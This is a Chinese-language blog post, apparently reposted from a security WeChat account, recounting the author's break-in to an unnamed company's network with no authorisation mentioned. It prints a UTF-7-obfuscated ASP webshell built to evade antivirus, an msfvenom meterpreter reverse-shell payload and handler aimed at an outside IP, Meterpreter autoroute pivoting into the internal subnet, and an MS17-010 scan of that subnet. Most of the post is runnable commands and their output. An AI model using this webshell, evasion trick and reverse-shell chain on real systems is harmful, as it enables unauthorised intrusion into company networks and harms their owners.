从某公司文件上传到内网漫游

admin 2020年10月25日10:15:19评论272 views字数 2944阅读9分48秒阅读模式

今天拿到一个某公司文件上传点,就尝试一波getshell,最后成功进入内网,这里记录一下思路和操作。对于大佬来说应该都很基础,但是对于我这个划水混子来说还是学到了一些东西。


这个站我拿到的时候就直接是一个文件上传点了,通过对这个站点分析得知应该是由一个文件遍历漏洞找到的文件上传点


从某公司文件上传到内网漫游

从某公司文件上传到内网漫游


上传一句话木马连接shell


就想着能不能上传一个木马连接shell,尝试上传了普通的asp一句话木马,蚁剑刚测试连接成功就断开,上传页面也显示文件被删除。


有朋友上传了免杀asp大马感觉用起来不方便,也不稳定,所以就构造asp的免杀一句话木马


一个密码为"LandGrey"的原始ASP一句话脚本代码如下


<%@codepage=65000%><%response.codepage=65001:eval(request("LandGrey"))%>

参考免杀webshellhttps://github.com/LandGrey/webshell-detect-bypass


UTF-7编码后如下

<%@codepage=65000%><%+AHIAZQBzAHAAbwBuAHMAZQAuAGMAbwBkAGUAcABhAGcAZQA9ADYANQAwADAAMQA6AGUAdgBhAGwAKAByAGUAcQB1AGUAcwB0ACgAIgBMAGEAbgBkAEcAcgBlAHkAIgApACk-%>


这种方式可以躲过较多webshell检测软件查杀,但是D盾Webshell查杀工具,提示脚本使用了UTF-7编码,并不能做到完全不被察觉。这里我感觉应该能绕过服务器内的查杀软件了


从某公司文件上传到内网漫游


从某公司文件上传到内网漫游


失败的提权过程


看了下ip发现是内网,用户为iis,尝试提权也失败了

从某公司文件上传到内网漫游


查看运行的服务

从某公司文件上传到内网漫游


存在360杀毒,所以之前的普通一句话木马都被杀了


内网漫游


在这里我考虑了很久,想打入内网我想到了三种方式。可以直接把数据转发出来本地代理渗透内网,但是目标主机是内网IP,还可以用lcx将内网主机3389端口转发到有公网IP的服务器上,我们再进行远程登陆,但是我没有windows服务器还没有足够的权限去实现,甚至还可以用msf生成木马直接连接,但是想到有360杀毒应该会被杀。


最后一种方式我试了一下,先在本地kali虚拟机生成一个连接到服务器的msf木马,再转发到本地macos通过蚁剑上传到目标内网windows上

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=45.77.124.165 lport=1234 -f exe -o red.exescp -p red.exe reder@172.22.163.184:~/

从某公司文件上传到内网漫游


上传成功,竟然没被360杀掉还是比较意外


从某公司文件上传到内网漫游


先通过蚁剑开启该木马再登陆服务器开启msf连接木马

use exploit/multi/handlerset payload windows/x64/meterpreter/reverse_tcpset lhost 45.77.124.165set lport 1234run


从某公司文件上传到内网漫游


接下来就是获取目标网段信息,在MSF平台监听端,我们获取反弹的shell后(即session),我们可以直接在meterpreter控制终端进行目标网段信息的查询,具体查询命令如下

meterpreter > run get_local_subnets
[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]Local subnet: 10.255.4.0/255.255.255.0

添加目标网段路由

meterpreter > run autoroute -s 10.255.4.0/24[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...][*] Adding a route to 10.255.4.0/255.255.255.0...[+] Added route to 10.255.4.0/255.255.255.0 via 218.70.16.163[*] Use the -p option to list all active routes

路由查询

meterpreter > run autoroute -p   10.255.4.0         255.255.255.0      Session 4[!] Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.[!] Example: run post/multi/manage/autoroute OPTION=value [...]
Active Routing Table====================
Subnet Netmask Gateway ------ ------- -------

我们将去往内网的路由打通后,接下来就可以使用MSF平台直接对内网主机扫描和进行各种高危漏洞的直接渗透利用了。


首先我们需要退到MSF攻击平台的操作面,为后面调用其他攻击模块做好准备,具体操作如下。

meterpreter > backgroundmsf5 exploit(multi/handler) > sessions -i
Active sessions===============
Id Name Type Information Connection -- ---- ---- ----------- ---------- 4 meterpreter x64/windows IIS APPPOOLECI_EEMS @ WEBSRV3 45.77.124.165:1234 -> xx.xx.xx.xx:29007 (10.255.4.3)
msf5 exploit(multi/handler) > use auxiliary/scanner/smb/smb_ms17_010msf5 auxiliary(scanner/smb/smb_ms17_010) > set rhosts 10.255.4.0/24rhosts => 10.255.4.0/24msf5 auxiliary(scanner/smb/smb_ms17_010) > set threads 50threads => 50msf5 auxiliary(scanner/smb/smb_ms17_010) > run

从某公司文件上传到内网漫游

扫描了一下网段内MS17-010漏洞,过主机漏洞扫描,我们发现很多主机都存在MS17-010漏洞。


从某公司文件上传到内网漫游


打完收工


到了这里我们可以做的事情就比较多了,内网的一切尽在掌握。自此我们使用的传码到"MSF 的跳转路由转发"直接使用外网的MSF平台实现对内网私有主机的攻击实战结束,好了打完收工。


作者:BestReder
链接:https://www.jianshu.com/p/bb5764f945a2



扫描关注乌云安全

从某公司文件上传到内网漫游

觉得不错点个“赞”、“在看”哦从某公司文件上传到内网漫游

本文始发于微信公众号(乌雲安全):从某公司文件上传到内网漫游

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月25日10:15:19
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   从某公司文件上传到内网漫游http://cn-sec.com/archives/169970.html

发表评论

匿名网友 填写信息